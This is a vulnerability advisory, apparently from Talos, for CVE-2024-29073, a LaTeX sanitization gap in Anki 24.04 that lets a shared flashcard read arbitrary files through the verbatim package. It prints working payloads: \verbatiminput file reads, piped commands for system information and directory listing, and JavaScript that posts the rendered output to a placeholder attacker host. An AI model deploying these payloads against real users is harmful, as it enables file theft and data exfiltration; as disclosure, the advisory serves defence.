CVE-2024-29073
An vulnerability in the handling of Latex exists in Ankitects Anki 24.04. When Latex is sanitized to prevent unsafe commands, the verbatim package, which comes installed by default in many Latex distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Ankitects Anki 24.04
Anki - https://apps.ankiweb.net/
5.3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-829 - Inclusion of Functionality from Untrusted Control Sphere
Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).
Anki offers users the option to publicy share their decks, and it is normal behaviour to use them; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.
Anki uses LaTeX to show images or other TeX models in the flashcards. This requires a Latex handler to be installed, for Windows the Anki documentation suggests users install MiKTeX. There are some TeX commands which will allow you to do things you shouldn’t do, such as read files or write files.
Anki has a blocklist preventing the use of commands that reads file descriptors, but verbatim
package command seems to have been overlooked (the package comes bundled with all LaTeX distributions).
An attacker using specialy crafted card’s header section :
\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}
can load verbatim
package and further abuse its functionality.
Using verbatiminput
tag inside card body an attacker can perform the following operations:
For arbitrary file read:
[latex]\verbatiminput{PATH_TO_FILE}[/latex]
For system information:
[latex]\verbatiminput{|texosquery-jre8 -o -r -a -l}[/latex]
Or for listing directories / files:
[latex]\verbatiminput{|kpsewhich ~/*}[/latex]
The attacker can read the result of the rendered tags by exploiting the fact that the content will be associated with the HTML document tag called “img.latex”. With this knowledge, we can add appropriate JavaScript code to the card template.
const latex_image = document.querySelector("img.latex").getAttribute("src");
fetchFileAndConvertToBase64(`http://${window.location.hostname}:${window.location.port}/${latex_image}`).then(base64Data => postBase64ToUrl(`http://${REPLACE_HOST_HERE}/upload`, base64Data))
which will obtain img.latex
content and send it to attacker controled server.
2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release
Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.